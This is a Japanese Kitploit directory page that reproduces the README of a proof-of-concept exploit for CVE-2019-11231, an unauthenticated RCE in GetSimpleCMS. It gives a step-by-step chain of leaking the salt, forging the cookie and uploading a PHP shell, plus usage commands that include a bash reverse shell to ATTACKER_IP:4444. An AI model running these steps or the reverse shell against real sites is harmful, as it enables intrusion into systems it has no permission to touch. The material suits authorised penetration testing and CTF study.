Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2019-11231-PoC — CVE-2019-11231のPoC | Kitploit
ツール/GitHubGitHub/akincibor/cve-2019-11231-poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubakincibor/cve-2019-11231-poc

CVE-2019-11231-PoC

CVE-2019-11231のPoC

リポジトリを見る
18ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

GetSimpleCMS CVE-2019-11231 RCE エクスプロイト

Python CVE

GetSimpleCMS ≤ 3.3.15 用 認証なしリモートコード実行エクスプロイト

脆弱性

GetSimpleCMS は機密ファイルを公開します(/data/other/authorization.xml、/data/users/)。これにより攻撃者は以下を実行できます:

  1. API キーとユーザー名の漏洩
  2. 認証クッキーの偽造
  3. CSRF トークンの取得
  4. 任意の PHP コードのアップロードと実行

CVSS スコア: 9.8(緊急)

使い方

root@kitploit:~
pip install -r requirements.txt
python3 exploit.py http://target.com "id"
python3 exploit.py gettingstarted.htb "whoami"
python3 /tmp/test.py gettingstarted.htb "/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"

動作の仕組み

  1. バージョンの列挙 → GET /admin/
  2. ソルトの漏洩 → GET /data/other/authorization.xml
  3. ユーザー名の取得 → GET /data/users/
  4. クッキーの偽造 → SHA1(username + salt)
  5. nonce の取得 → GET /admin/theme-edit.php
  6. シェルのアップロード → POST /admin/theme-edit.php
  7. コマンドの実行 → GET /theme/shell.php?cmd=...

ファイル

  • exploit.py - メインのエクスプロイトスクリプト
  • requirements.txt - 依存関係(requests、beautifulsoup4)

免責事項

⚠️ 教育目的のみ。 自分が所有している、またはテスト許可を得たシステムでのみテストしてください。

参照

  • https://ssd-disclosure.com/archives/3899/ssd-advisory-getcms-unauthenticated-remote-code-execution
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11231
ツールをダウンロード